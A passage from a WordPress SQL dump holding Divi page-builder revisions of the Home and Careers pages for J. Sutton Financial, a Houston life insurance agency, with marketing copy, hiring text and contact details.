sticky_enabled=\"0\"][et_pb_column type=\"1_2\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_style=\"roll\" sticky_enabled=\"0\" width=\"70%\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#cccac7\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\" custom_margin=\"77px|||||\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_margin=\"10px|auto||auto||\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"86px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||183px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||-4px|||\" custom_padding=\"168px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Proudly Headquartered in Houston, Texas</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-20px|auto||auto||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"12px|||||\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" link_font=\"||||on||||dotted\" custom_margin=\"62px|||||\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">340 North Sam Houston Parkway East</span><br /><span style=\"color: #ffffff;\">Houston, TX 77060</span><br /><span style=\"color: #ffffff;\"><a href=\"mailto:info@JSuttonFinancial.com\" style=\"color: #ffffff;\">info@JSuttonFinancial.com</a></span><br /><span style=\"color: #ffffff;\"><a href=\"tel:713-254-3439\" style=\"color: #ffffff;\">(713) 254-3439</a></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-31 20:39:27','2023-03-31 20:39:27','',138,'http://cmdev-site1.com/?p=552',0,'revision','',0),(564,3,'2023-04-01 14:20:01','2023-04-01 14:20:01','{\n    \"site_icon\": {\n        \"value\": 562,\n        \"type\": \"option\",\n        \"user_id\": 3,\n        \"date_modified_gmt\": \"2023-04-01 14:20:01\"\n    }\n}','','','trash','closed','closed','','1fdef36a-fff2-491d-8f73-837d728a040b','','','2023-04-01 14:20:01','2023-04-01 14:20:01','',0,'http://cmdev-site1.com/2023/04/01/1fdef36a-fff2-491d-8f73-837d728a040b/',0,'customize_changeset','',0),(555,1,'2023-03-31 20:45:15','2023-03-31 20:45:15','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><strong>WE ARE HIRING!</strong></p>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-03-31 20:45:15','2023-03-31 20:45:15','',38,'http://cmdev-site1.com/?p=555',0,'revision','',0),(566,1,'2023-04-02 17:23:48','2023-04-02 17:23:48','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" dropdown_menu_line_color=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" dropdown_menu_active_link_color=\"#003372\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial,\" typing_effect=\"an Independent Agency for American Income Life Insurance Company  \" before_new_line=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#FFFFFF\" global_colors_info=\"{}\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"2px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"80%\" custom_margin=\"|37px||||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#cccac7\" custom_margin=\"77px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"99.9%\" custom_margin=\"|-14px||||\" custom_padding=\"8px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_padding=\"|||0px||\" animation_style=\"fade\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||183px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||-4px|||\" custom_padding=\"168px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Proudly Headquartered in Houston, Texas</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-20px|auto||auto||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"12px|||||\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" link_font=\"||||on||||dotted\" custom_margin=\"62px|||||\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">340 North Sam Houston Parkway East</span><br /><span style=\"color: #ffffff;\">Houston, TX 77060</span><br /><span style=\"color: #ffffff;\"><a href=\"mailto:info@JSuttonFinancial.com\" style=\"color: #ffffff;\">info@JSuttonFinancial.com</a></span><br /><span style=\"color: #ffffff;\"><a href=\"tel:713-254-3439\" style=\"color: #ffffff;\">(713) 254-3439</a></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 17:23:48','2023-04-02 17:23:48','',138,'http://cmdev-site1.com/?p=566',0,'revision','',0),(556,1,'2023-03-31 20:45:45','2023-03-31 20:45:45','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_4,3_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial,\" typing_effect=\"an Independent Agency for American Income Life Insurance Company  \" before_new_line=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#FFFFFF\" global_colors_info=\"{}\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"2px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" width=\"100%\" max_width=\"100%\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_style=\"roll\" sticky_enabled=\"0\" width=\"80%\" custom_padding=\"33px|1px||||\" custom_margin=\"|37px||||\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#cccac7\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\" custom_margin=\"77px|||||\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_margin=\"10px|auto||auto||\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"8px||0px|||\" global_colors_info=\"{}\" width=\"99.9%\" custom_margin=\"|-14px||||\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" width=\"70%\" sticky_enabled=\"0\" animation_style=\"fade\" custom_padding=\"|||0px||\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||183px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||-4px|||\" custom_padding=\"168px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Proudly Headquartered in Houston, Texas</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-20px|auto||auto||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"12px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" link_font=\"||||on||||dotted\" custom_margin=\"62px|||||\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">340 North Sam Houston Parkway East</span><br /><span style=\"color: #ffffff;\">Houston, TX 77060</span><br /><span style=\"color: #ffffff;\"><a href=\"mailto:info@JSuttonFinancial.com\" style=\"color: #ffffff;\">info@JSuttonFinancial.com</a></span><br /><span style=\"color: #ffffff;\"><a href=\"tel:713-254-3439\" style=\"color: #ffffff;\">(713) 254-3439</a></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-31 20:45:45','2023-03-31 20:45:45','',138,'http://cmdev-site1.com/?p=556',0,'revision','',0),(567,1,'2023-04-02 17:25:00','2023-04-02 17:25:00','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" 